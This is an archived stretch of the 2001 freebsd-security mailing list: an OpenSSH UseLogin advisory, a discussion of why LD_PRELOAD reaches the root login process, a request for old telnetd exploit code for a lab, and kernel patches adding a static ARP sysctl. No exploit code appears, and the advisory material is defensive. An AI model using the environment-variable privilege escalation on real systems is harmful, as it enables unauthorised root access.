> Yeah, if you don't want to be vulnerable to the 'UseLogin' exploit.  The
> packages should have shown up on the mirrors by now.
>
> --Erick
>
> ----------------------------------------
>
> Important Changes:
> ==================
>
>         This release fixes a vulnerability in the UseLogin option
>         of OpenSSH.  This option is not enabled in the default
>         installation of OpenSSH.
>
>         However, if UseLogin is enabled by the administrator, all
>         versions of OpenSSH prior to 3.0.2 may be vulnerable to
>         local attacks.
>
>         The vulnerability allows local users to pass environment
>         variables (e.g. LD_PRELOAD) to the login process.  The login
>         process is run with the same privilege as sshd (usually
>         with root privilege).
>
>         Do not enable UseLogin on your machines or disable UseLogin
>         again in /etc/sshd_config:
>                 UseLogin no
>
> ----------------------------------------
>
> At Tue, Dec 04, 2001 at 05:01:18PM -0800, Henry smith said this:
> :: Right now, I'm using OpenSSH_3.0.1. Do I need to
> :: upgrade to 3.0.2 ?
> ::
> ::
> :: __________________________________________________
> :: Do You Yahoo!?
> :: Buy the perfect holiday gifts at Yahoo! Shopping.
> :: http://shopping.yahoo.com
> ::
> :: To Unsubscribe: send mail to majordomo@FreeBSD.org
> :: with "unsubscribe freebsd-security" in the body of the message
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
>


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  4:56: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1])
	by hub.freebsd.org (Postfix) with ESMTP id 8E71C37B41B
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 04:56:05 -0800 (PST)
Received: (from root@localhost)
	by cage.simianscience.com (8.11.6/8.11.6) id fB5Cu4V31209;
	Wed, 5 Dec 2001 07:56:04 -0500 (EST)
	(envelope-from mike@sentex.net)
Received: from chimp.sentex.net (fcage [192.168.0.2])
	by cage.simianscience.com (8.11.6/8.11.6av) with ESMTP id fB5Cu1k31201;
	Wed, 5 Dec 2001 07:56:02 -0500 (EST)
	(envelope-from mike@sentex.net)
Message-Id: <5.1.0.14.0.20011205075512.05028030@192.168.0.12>
X-Sender: mdtancsa@192.168.0.12
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Wed, 05 Dec 2001 07:56:00 -0500
To: wkt@tuhs.org
From: Mike Tancsa <mike@sentex.net>
Subject: Re: Strange request, telnetd exploit
Cc: freebsd-security@freebsd.org
In-Reply-To: <200112050546.fB55kTf46559@minnie.tuhs.org>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


Try www.securityfocus.com. I am pretty sure it was posted to bugtraq.

         ---Mike

At 04:46 PM 12/5/2001 +1100, Warren Toomey wrote:
>I'd like to set up the old, vulnerable telnet with appropriate
>/etc/hosts.allow rules to only allow an attack from within the local subnet.
>
>However, I cannot find a copy of the exploit code. Can anybody help me?

--------------------------------------------------------------------
Mike Tancsa,                          	          tel +1 519 651 3400
Sentex Communications,     			  mike@sentex.net
Providing Internet since 1994                    www.sentex.net
Cambridge, Ontario Canada			  www.sentex.net/mike


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  6: 8:23 2001
Delivered-To: freebsd-security@freebsd.org
Received: from MCSMTP2.MC.VANDERBILT.EDU (mcsmtp2.mc.Vanderbilt.Edu [160.129.50.78])
	by hub.freebsd.org (Postfix) with ESMTP id 6F1C037B417
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 06:08:21 -0800 (PST)
Subject: ipsec/kame question
To: freebsd-security@freebsd.org
X-Mailer: Lotus Notes Release 5.0.6a  January 17, 2001
Message-ID: <OF869B47B4.BB548F5E-ON86256B19.004D6567@MC.VANDERBILT.EDU>
From: George.Giles@mcmail.vanderbilt.edu
Date: Wed, 5 Dec 2001 08:06:17 -0600
X-MIMETrack: Serialize by Router on MCSMTP2.MC.vanderbilt.edu/VUMC/Vanderbilt(Release 5.0.6a
 |January 17, 2001) at 12/05/2001 07:59:25 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Where are the set-up instructions ipV6 on FreeBSD ?


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  6:23:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from freebsd.org.ru (sweet.etrust.ru [194.84.67.5])
	by hub.freebsd.org (Postfix) with ESMTP id 9EC0537B417
	for <security@FreeBSD.org>; Wed,  5 Dec 2001 06:23:10 -0800 (PST)
Received: by freebsd.org.ru (Postfix, from userid 1000)
	id F391328B; Wed,  5 Dec 2001 17:23:02 +0300 (MSK)
Date: Wed, 5 Dec 2001 17:23:02 +0300
From: "Sergey A. Osokin" <osa@freebsd.org.ru>
To: George.Giles@mcmail.vanderbilt.edu
Cc: security@FreeBSD.org
Subject: Re: ipsec/kame question
Message-ID: <20011205172302.A17179@freebsd.org.ru>
References: <OF869B47B4.BB548F5E-ON86256B19.004D6567@MC.VANDERBILT.EDU>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <OF869B47B4.BB548F5E-ON86256B19.004D6567@MC.VANDERBILT.EDU>; from George.Giles@mcmail.vanderbilt.edu on Wed, Dec 05, 2001 at 08:06:17AM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 08:06:17AM -0600, George.Giles@mcmail.vanderbilt.edu wrote:
> Where are the set-up instructions ipV6 on FreeBSD ?

http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/ipsec.html ?

-- 

Rgdz,                                /"\ 
Sergey Osokin aka oZZ,               \ /  ASCII RIBBON CAMPAIGN
osa@freebsd.org.ru                    X     AGAINST HTML MAIL
http://freebsd.org.ru/~osa/          / \

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  7:53:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [208.42.49.153])
	by hub.freebsd.org (Postfix) with ESMTP id A84CF37B416
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 07:53:34 -0800 (PST)
Received: from madman.nectar.com (madman.nectar.com [10.0.1.111])
	by gw.nectar.com (Postfix) with ESMTP
	id 1C43ED; Wed,  5 Dec 2001 09:53:34 -0600 (CST)
Received: (from nectar@localhost)
	by madman.nectar.com (8.11.6/8.11.6) id fB5FrWr23158;
	Wed, 5 Dec 2001 09:53:32 -0600 (CST)
	(envelope-from nectar)
Date: Wed, 5 Dec 2001 09:53:32 -0600
From: "Jacques A. Vidrine" <n@nectar.cc>
To: titus manea <titus@edc.dnttm.ro>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: OpenSSH UseLogin problem
Message-ID: <20011205155332.GA23116@madman.nectar.com>
Mail-Followup-To: "Jacques A. Vidrine" <n@nectar.cc>,
	titus manea <titus@edc.dnttm.ro>, freebsd-security@FreeBSD.ORG
References: <20011205090318.A7617@unix.edc.dnttm.ro>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20011205090318.A7617@unix.edc.dnttm.ro>
User-Agent: Mutt/1.3.23.1i
X-Url: http://www.nectar.cc/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 09:03:18AM +0200, titus manea wrote:
> LD_ env vars like LD_LIBRARY_PATH and such do not work for setuid binaries.
> (ld.so man page)
> programs. Here is an example ( i did it as root). 

The check is not actually for setuid binaries.  The check is for
uid == euid && gid == egid.  Because of the way that OpenSSH
handles privilege switching, uid == euid == gid == egid == 0 when
/usr/bin/login is invoked.  OpenSSH-portable, on the other hand,
happens to handle this differently, and you get uid == euid == egid
== 0, but gid = <user's gid>.  That's why it is not vulnerable in any
case.

Login as root instead of su'ing to root, and you'll probably get
`better' results.

Cheers,
-- 
Jacques A. Vidrine <n@nectar.cc>                     http://www.nectar.cc/
NTT/Verio SME           .      FreeBSD UNIX      .        Heimdal Kerberos
jvidrine@verio.net      .   nectar@FreeBSD.org   .           nectar@kth.se

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  8:18:18 2001
Delivered-To: freebsd-security@freebsd.org
Received: from D00015.dialonly.kemerovo.su (www2.svzserv.kemerovo.su [213.184.65.86])
	by hub.freebsd.org (Postfix) with ESMTP
	id 7D5CA37B416; Wed,  5 Dec 2001 08:18:05 -0800 (PST)
Received: (from eugen@localhost)
	by D00015.dialonly.kemerovo.su (8.11.6/8.11.4) id fB5GHZt01557;
	Wed, 5 Dec 2001 23:17:35 +0700 (KRAT)
	(envelope-from eugen)
Date: Wed, 5 Dec 2001 23:17:35 +0700
From: Eugene Grosbein <eugen@grosbein.pp.ru>
To: "Crist J . Clark" <cjc@FreeBSD.ORG>
Cc: security@FreeBSD.ORG, net@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011205231735.A1361@grosbein.pp.ru>
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20011205040316.H40864@blossom.cjclark.org>; from cjc@FreeBSD.ORG on Wed, Dec 05, 2001 at 04:03:16AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 04:03:16AM -0800, Crist J . Clark wrote:

> > Not sure what is correct list, this is about network security.
> > Flag NOARP did not work for ethernet interface before 4.4-RELEASE.
> > We needed static ARP table so used local patch for it.
> > 4.4-RELEASE implemented NOARP but in the different way.
> See PR 31873.

I have read this PR and other discussions. 
And I want to say that this 'intended' behavour is useless for some
configurations. A machine acting as public gateway must respond 
to ARP requests for its IP. And it often must not allow modifying 
its ARP table. So I'm asking to have another behavour as an option. 
Perhaps, tunable as sysctl.

We use this scheme several years in production, keeping our local patches.
It seems this scheme is used widely, I've seen several different patches
implementing this since 2.2.x. We use one of them.

Eugene Grosbein.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  8:38:41 2001
Delivered-To: freebsd-security@freebsd.org
Received: from salseiros.melim.com.br (salseiros.melim.com.br [200.215.110.23])
	by hub.freebsd.org (Postfix) with ESMTP id D302B37B405
	for <security@freebsd.org>; Wed,  5 Dec 2001 08:38:37 -0800 (PST)
Received: from fazendinha (ressacada.melim.com.br [200.215.110.4])
	by salseiros.melim.com.br (Postfix) with SMTP id F0E60BAA3
	for <security@freebsd.org>; Wed,  5 Dec 2001 14:38:29 -0200 (BRST)
Message-ID: <02f601c17dab$85743670$2aa8a8c0@melim.com.br>
From: "Ronan Lucio" <ronan@melim.com.br>
To: <security@freebsd.org>
Subject: Securty logs
Date: Wed, 5 Dec 2001 14:40:17 -0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hi All,

I have a doubt about the entries in the security log file.

If I have icmp 8,0 denied for external computers, when
someone pings, it create an entry in security log file:

Dec  5 14:01:12 server /kernel: ipfw: 3000 Deny ICMP:8.0 62.211.157.214
255.255.255.255 in via fxp0

But if such computer give a flood attack, I think it will
create the same entry.

How can I identify if an entry in security log file was creted
by simple ping or by a flood attack?

Thank�s to all,

Ronan


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  8:53:46 2001
Delivered-To: freebsd-security@freebsd.org
Received: from osi-east2.nersc.gov (osi-east2.nersc.gov [128.55.6.20])
	by hub.freebsd.org (Postfix) with ESMTP id 9803337B405
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 08:53:40 -0800 (PST)
Received: from gemini.nersc.gov (gemini.nersc.gov [128.55.16.111])
	by osi-east2.nersc.gov (8.9.2/8.9.2) with ESMTP id IAA28049;
	Wed, 5 Dec 2001 08:53:39 -0800 (PST)
Received: from gemini.nersc.gov (localhost [127.0.0.1])
	by gemini.nersc.gov (Postfix) with ESMTP
	id 462183B1A2; Wed,  5 Dec 2001 08:53:39 -0800 (PST)
X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
To: Brett Glass <brett@lariat.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Mail list is posting gone virus!!!! 
In-Reply-To: Message from Brett Glass <brett@lariat.org> 
   of "Wed, 05 Dec 2001 00:07:50 MST." <4.3.2.7.2.20011205000635.048414a0@localhost> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 05 Dec 2001 08:53:39 -0800
From: Eli Dart <dart@nersc.gov>
Message-Id: <20011205165339.462183B1A2@gemini.nersc.gov>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


In reply to Brett Glass <brett@lariat.org> :

> At 06:34 PM 12/4/2001, Len Conrad wrote:
> 
> >the freebsd hubs run postfix, afaik, which can block on single and double fi
 le extensions, like .scr, .doc.scr.
> 
> This helps, but it's far from the only heuristic to use.
> 
> Of course, since we're talking about mailing lists here, FreeBSD
> should probably just strip all attachments and defang or block
> active content.

Brett makes a very good point.  This is a _security_ mailing list, 
for discussion of security issues.  IMHO, there is no need for 
anything but plaintext traffic on this list.  If people are going to
send patches, they can include them as part of the text of the 
message.  This means that PGP signatures get lost, but exceptions can 
be made if that's deemed important.

My $0.02....

		--eli
> 
> --Brett
> 
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5  9:40:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65])
	by hub.freebsd.org (Postfix) with ESMTP
	id 862B637B417; Wed,  5 Dec 2001 09:39:56 -0800 (PST)
Received: (from ru@localhost)
	by whale.sunbay.crimea.ua (8.11.6/8.11.2) id fB5Hcx583401;
	Wed, 5 Dec 2001 19:38:59 +0200 (EET)
	(envelope-from ru)
Date: Wed, 5 Dec 2001 19:38:59 +0200
From: Ruslan Ermilov <ru@FreeBSD.ORG>
To: Eugene Grosbein <eugen@grosbein.pp.ru>
Cc: "Crist J . Clark" <cjc@FreeBSD.ORG>, net@FreeBSD.ORG,
	security@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011205193859.B79705@sunbay.com>
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20011205231735.A1361@grosbein.pp.ru>
User-Agent: Mutt/1.3.23i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 11:17:35PM +0700, Eugene Grosbein wrote:
> On Wed, Dec 05, 2001 at 04:03:16AM -0800, Crist J . Clark wrote:
> 
> > > Not sure what is correct list, this is about network security.
> > > Flag NOARP did not work for ethernet interface before 4.4-RELEASE.
> > > We needed static ARP table so used local patch for it.
> > > 4.4-RELEASE implemented NOARP but in the different way.
> > See PR 31873.
> 
> I have read this PR and other discussions. 
> And I want to say that this 'intended' behavour is useless for some
> configurations. A machine acting as public gateway must respond 
> to ARP requests for its IP. And it often must not allow modifying 
> its ARP table. So I'm asking to have another behavour as an option. 
> Perhaps, tunable as sysctl.
> 
> We use this scheme several years in production, keeping our local patches.
> It seems this scheme is used widely, I've seen several different patches
> implementing this since 2.2.x. We use one of them.
> 
Eugene,

The below patch implements this facility, activated by setting the
net.link.ether.inet.static_arp sysctl to a non-zero value.  It also
fixes an mbuf leak in arpresolve() if IFF_NOARP flag is set on an
interface, and an address resolution is attempted over it.

I am also going to add support for static ARP table to rc.conf(5),
which should address PR conf/23063.

Let me know what do you think about the patch.

Index: if_ether.c
===================================================================
RCS file: /home/ncvs/src/sys/netinet/if_ether.c,v
retrieving revision 1.64.2.11
diff -u -p -r1.64.2.11 if_ether.c
--- if_ether.c	2001/07/25 17:27:56	1.64.2.11
+++ if_ether.c	2001/12/05 17:29:02
@@ -106,6 +106,7 @@ static int	arp_inuse, arp_allocated;
 static int	arp_maxtries = 5;
 static int	useloopback = 1; /* use loopback interface for local traffic */
 static int	arp_proxyall = 0;
+static int	static_arp = 0;
 
 SYSCTL_INT(_net_link_ether_inet, OID_AUTO, maxtries, CTLFLAG_RW,
 	   &arp_maxtries, 0, "");
@@ -113,6 +114,8 @@ SYSCTL_INT(_net_link_ether_inet, OID_AUT
 	   &useloopback, 0, "");
 SYSCTL_INT(_net_link_ether_inet, OID_AUTO, proxyall, CTLFLAG_RW,
 	   &arp_proxyall, 0, "");
+SYSCTL_INT(_net_link_ether_inet, OID_AUTO, static_arp, CTLFLAG_RW,
+	   &static_arp, 0, "");
 
 static void	arp_rtrequest __P((int, struct rtentry *, struct sockaddr *));
 static void	arprequest __P((struct arpcom *,
@@ -408,8 +411,10 @@ arpresolve(ac, rt, m, dst, desten, rt0)
 	 * Probably should not allocate empty llinfo struct if we are
 	 * not going to be sending out an arp request.
 	 */
-	if (ac->ac_if.if_flags & IFF_NOARP)
+	if (ac->ac_if.if_flags & IFF_NOARP || static_arp) {
+		m_freem(m);
 		return (0);
+	}
 	/*
 	 * There is an arptab entry, but no ethernet address
 	 * response yet.  Replace the held mbuf with this
@@ -580,6 +585,8 @@ in_arpinput(m)
 		itaddr = myaddr;
 		goto reply;
 	}
+	if (static_arp)
+		goto reply;
 	la = arplookup(isaddr.s_addr, itaddr.s_addr == myaddr.s_addr, 0);
 	if (la && (rt = la->la_rt) && (sdl = SDL(rt->rt_gateway))) {
 		/* the following is not an error when doing bridging */


Cheers,
-- 
Ruslan Ermilov		Oracle Developer/DBA,
ru@sunbay.com		Sunbay Software AG,
ru@FreeBSD.org		FreeBSD committer,
+380.652.512.251	Simferopol, Ukraine

http://www.FreeBSD.org	The Power To Serve
http://www.oracle.com	Enabling The Information Age

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 10:32:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65])
	by hub.freebsd.org (Postfix) with ESMTP
	id A924837B405; Wed,  5 Dec 2001 10:31:34 -0800 (PST)
Received: (from ru@localhost)
	by whale.sunbay.crimea.ua (8.11.6/8.11.2) id fB5IV0C90013;
	Wed, 5 Dec 2001 20:31:00 +0200 (EET)
	(envelope-from ru)
Date: Wed, 5 Dec 2001 20:31:00 +0200
From: Ruslan Ermilov <ru@FreeBSD.ORG>
To: Eugene Grosbein <eugen@grosbein.pp.ru>
Cc: "Crist J . Clark" <cjc@FreeBSD.ORG>, net@FreeBSD.ORG,
	security@FreeBSD.ORG
Subject: Re: NOARP - gateway must answer and have frozen ARP table
Message-ID: <20011205203100.A89520@sunbay.com>
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20011205193859.B79705@sunbay.com>
User-Agent: Mutt/1.3.23i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

On Wed, Dec 05, 2001 at 07:38:59PM +0200, Ruslan Ermilov wrote:
> On Wed, Dec 05, 2001 at 11:17:35PM +0700, Eugene Grosbein wrote:
> > On Wed, Dec 05, 2001 at 04:03:16AM -0800, Crist J . Clark wrote:
> > 
> > > > Not sure what is correct list, this is about network security.
> > > > Flag NOARP did not work for ethernet interface before 4.4-RELEASE.
> > > > We needed static ARP table so used local patch for it.
> > > > 4.4-RELEASE implemented NOARP but in the different way.
> > > See PR 31873.
> > 
> > I have read this PR and other discussions. 
> > And I want to say that this 'intended' behavour is useless for some
> > configurations. A machine acting as public gateway must respond 
> > to ARP requests for its IP. And it often must not allow modifying 
> > its ARP table. So I'm asking to have another behavour as an option. 
> > Perhaps, tunable as sysctl.
> > 
> > We use this scheme several years in production, keeping our local patches.
> > It seems this scheme is used widely, I've seen several different patches
> > implementing this since 2.2.x. We use one of them.
> > 
> Eugene,
> 
> The below patch implements this facility, activated by setting the
> net.link.ether.inet.static_arp sysctl to a non-zero value.  It also
> fixes an mbuf leak in arpresolve() if IFF_NOARP flag is set on an
> interface, and an address resolution is attempted over it.
> 
> I am also going to add support for static ARP table to rc.conf(5),
> which should address PR conf/23063.
> 
> Let me know what do you think about the patch.
> 
Here's the version for -CURRENT:

Index: if_ether.c
===================================================================
RCS file: /home/ncvs/src/sys/netinet/if_ether.c,v
retrieving revision 1.88
diff -u -p -r1.88 if_ether.c
--- if_ether.c	5 Dec 2001 18:13:34 -0000	1.88
+++ if_ether.c	5 Dec 2001 18:26:00 -0000
@@ -107,6 +107,7 @@ static int	arp_inuse, arp_allocated;
 static int	arp_maxtries = 5;
 static int	useloopback = 1; /* use loopback interface for local traffic */
 static int	arp_proxyall = 0;
+static int	static_arp = 0;
 
 SYSCTL_INT(_net_link_ether_inet, OID_AUTO, maxtries, CTLFLAG_RW,
 	   &arp_maxtries, 0, "");
@@ -114,6 +115,8 @@ SYSCTL_INT(_net_link_ether_inet, OID_AUT
 	   &useloopback, 0, "");
 SYSCTL_INT(_net_link_ether_inet, OID_AUTO, proxyall, CTLFLAG_RW,
 	   &arp_proxyall, 0, "");
+SYSCTL_INT(_net_link_ether_inet, OID_AUTO, static_arp, CTLFLAG_RW,
+	   &static_arp, 0, "");
 
 static void	arp_init __P((void));
 static void	arp_rtrequest __P((int, struct rtentry *, struct rt_addrinfo *));
@@ -436,7 +439,7 @@ arpresolve(ifp, rt, m, dst, desten, rt0)
 	 * Probably should not allocate empty llinfo struct if we are
 	 * not going to be sending out an arp request.
 	 */
-	if (ifp->if_flags & IFF_NOARP) {
+	if (ifp->if_flags & IFF_NOARP || static_arp) {
 		m_freem(m);
 		return (0);
 	}
@@ -632,6 +635,8 @@ match:
 		itaddr = myaddr;
 		goto reply;
 	}
+	if (static_arp)
+		goto reply;
 	la = arplookup(isaddr.s_addr, itaddr.s_addr == myaddr.s_addr, 0);
 	if (la && (rt = la->la_rt) && (sdl = SDL(rt->rt_gateway))) {
 		/* the following is not an error when doing bridging */


Cheers,
-- 
Ruslan Ermilov		Oracle Developer/DBA,
ru@sunbay.com		Sunbay Software AG,
ru@FreeBSD.org		FreeBSD committer,
+380.652.512.251	Simferopol, Ukraine

http://www.FreeBSD.org	The Power To Serve
http://www.oracle.com	Enabling The Information Age

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 10:35:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from whizzo.transsys.com (whizzo.TransSys.COM [144.202.42.10])
	by hub.freebsd.org (Postfix) with ESMTP
	id 7DE4C37B405; Wed,  5 Dec 2001 10:35:53 -0800 (PST)
Received: from whizzo.transsys.com (#6@localhost.transsys.com [127.0.0.1])
	by whizzo.transsys.com (8.11.6/8.11.6) with ESMTP id fB5IZqH95521;
	Wed, 5 Dec 2001 13:35:52 -0500 (EST)
	(envelope-from louie@whizzo.transsys.com)
Message-Id: <200112051835.fB5IZqH95521@whizzo.transsys.com>
X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4
To: Ruslan Ermilov <ru@FreeBSD.ORG>
Cc: Eugene Grosbein <eugen@grosbein.pp.ru>,
	"Crist J . Clark" <cjc@FreeBSD.ORG>, net@FreeBSD.ORG,
	security@FreeBSD.ORG
X-Image-URL: http://www.transsys.com/louie/images/louie-mail.jpg
From: "Louis A. Mamakos" <louie@TransSys.COM>
Subject: Re: NOARP - gateway must answer and have frozen ARP table 
References: <20011205124430.A83642@svzserv.kemerovo.su> <20011205040316.H40864@blossom.cjclark.org> <20011205231735.A1361@grosbein.pp.ru> <20011205193859.B79705@sunbay.com> 
In-reply-to: Your message of "Wed, 05 Dec 2001 19:38:59 +0200."
             <20011205193859.B79705@sunbay.com> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Wed, 05 Dec 2001 13:35:52 -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Doesn't this behavior need to be on a per-interface basis?  I'm wondering
if a single sysctl is sufficient to get the desired effect.

louie


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 10:47:12 2001
Delivered-To: freebsd-security@freebsd.org
